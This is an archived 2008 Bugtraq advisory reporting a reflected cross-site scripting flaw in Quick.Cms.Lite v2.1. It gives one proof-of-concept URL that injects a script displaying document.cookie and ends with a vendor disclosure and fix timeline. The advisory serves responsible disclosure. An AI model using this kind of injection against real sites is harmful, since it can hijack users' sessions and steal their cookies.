[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[NOBYTES.COM: #14] Quick.Cms.Lite v2.1 Freeware - Cross Site Scripting
- To: <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: [NOBYTES.COM: #14] Quick.Cms.Lite v2.1 Freeware - Cross Site Scripting
- From: "John Cobb" <johnc@xxxxxxxxxxx>
- Date: Tue, 16 Sep 2008 22:15:16 +0100
Application: Quick.Cms.Lite v2.1 Freeware
Authors Site: http://opensolution.org/quick.cms,en,10.html
+--------------------------------------------------------------+
XSS:
http://www.victim.com/admin.php?"><script>alert(document.cookie)</script><"
+-[Notes:]-----------------------------------------------------+
This only appears to work on Internet Explorer.
Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: 08/09/2008
Author(s) Fix: 16/09/2008
JohnC@xxxxxxxxxxx
http://www.NoBytes.com